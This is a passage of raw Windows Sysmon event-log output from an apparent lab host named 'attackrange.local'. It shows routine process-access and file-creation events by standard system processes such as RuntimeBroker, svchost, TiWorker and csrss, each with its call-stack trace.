em32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd 11241100x8000000000000000361240Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}8628C:\Windows\System32\RuntimeBroker.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask01_28_23_13_19_7856.txt2021-01-28 22:13:19.801 10341000x8000000000000000361239Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+547a7|C:\Windows\System32\windows.storage.dll+5461d|C:\Windows\System32\windows.storage.dll+54315|C:\Windows\System32\windows.storage.dll+53c52|C:\Windows\System32\windows.storage.dll+53b44|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d 10341000x8000000000000000361238Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+134c56|C:\Windows\System32\windows.storage.dll+13488f|C:\Windows\System32\windows.storage.dll+134753|C:\Windows\System32\windows.storage.dll+539e1|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed|C:\Windows\System32\user32.dll+15de2 10341000x8000000000000000361237Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.785{8e433fbf-36ff-6013-ae03-000000001100}86285796C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+1bd0c|C:\Windows\System32\shcore.dll+1be4e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361236Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.723{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+161b3|C:\Windows\System32\windows.storage.dll+15ed8|C:\Windows\System32\windows.storage.dll+18dc4|C:\Windows\System32\windows.storage.dll+19580|C:\Windows\System32\windows.storage.dll+196df|C:\Windows\System32\windows.storage.dll+a59b2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed 10341000x8000000000000000361235Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.723{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+16230|C:\Windows\System32\windows.storage.dll+15eb9|C:\Windows\System32\windows.storage.dll+18dc4|C:\Windows\System32\windows.storage.dll+19580|C:\Windows\System32\windows.storage.dll+196df|C:\Windows\System32\windows.storage.dll+a59b2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed 10341000x8000000000000000361234Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.723{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+19061|C:\Windows\System32\windows.storage.dll+18f0a|C:\Windows\System32\windows.storage.dll+18e83|C:\Windows\System32\windows.storage.dll+19381|C:\Windows\System32\windows.storage.dll+19539|C:\Windows\System32\windows.storage.dll+196df|C:\Windows\System32\windows.storage.dll+a59b2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d 10341000x8000000000000000361233Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.723{8e433fbf-36ff-6013-ae03-000000001100}86285796C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\RuntimeBroker.exe+3a5b|C:\Windows\System32\RuntimeBroker.exe+38be|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361232Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.723{8e433fbf-36ff-6013-ae03-000000001100}86285796C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+133114|C:\Windows\System32\windows.storage.dll+7ab6c|C:\Windows\System32\windows.storage.dll+7cfdc|C:\Windows\System32\windows.storage.dll+172615|C:\Windows\System32\combase.dll+7a936|C:\Windows\System32\combase.dll+7956d|C:\Windows\System32\RuntimeBroker.exe+38a4|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000361231Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.629{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+134c56|C:\Windows\System32\windows.storage.dll+13488f|C:\Windows\System32\windows.storage.dll+134753|C:\Windows\System32\windows.storage.dll+8a5d8|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed|C:\Windows\System32\user32.dll+15de2|C:\Windows\System32\shcore.dll+cbfc|C:\Windows\System32\shcore.dll+c218 10341000x8000000000000000361230Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.629{8e433fbf-36ff-6013-ae03-000000001100}86285796C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\RuntimeBroker.exe+3a5b|C:\Windows\System32\RuntimeBroker.exe+38be|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361229Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.613{8e433fbf-36ff-6013-ae03-000000001100}86285796C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+133114|C:\Windows\System32\windows.storage.dll+7ab6c|C:\Windows\System32\windows.storage.dll+7cfdc|C:\Windows\System32\windows.storage.dll+172615|C:\Windows\System32\combase.dll+7a936|C:\Windows\System32\combase.dll+7956d|C:\Windows\System32\RuntimeBroker.exe+38a4|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000361228Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.582{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0e00-000000001100}712C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361227Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.582{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0e00-000000001100}712C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361226Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.582{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0e00-000000001100}712C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361225Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.566{8e433fbf-36ff-6013-ad03-000000001100}34285748C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe+4121|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5 10341000x8000000000000000361224Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.457{8e433fbf-2a44-6013-1100-000000001100}11163904C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361223Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.457{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361222Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.441{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361221Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.441{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361220Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.441{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361219Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.441{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361218Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.441{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361217Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 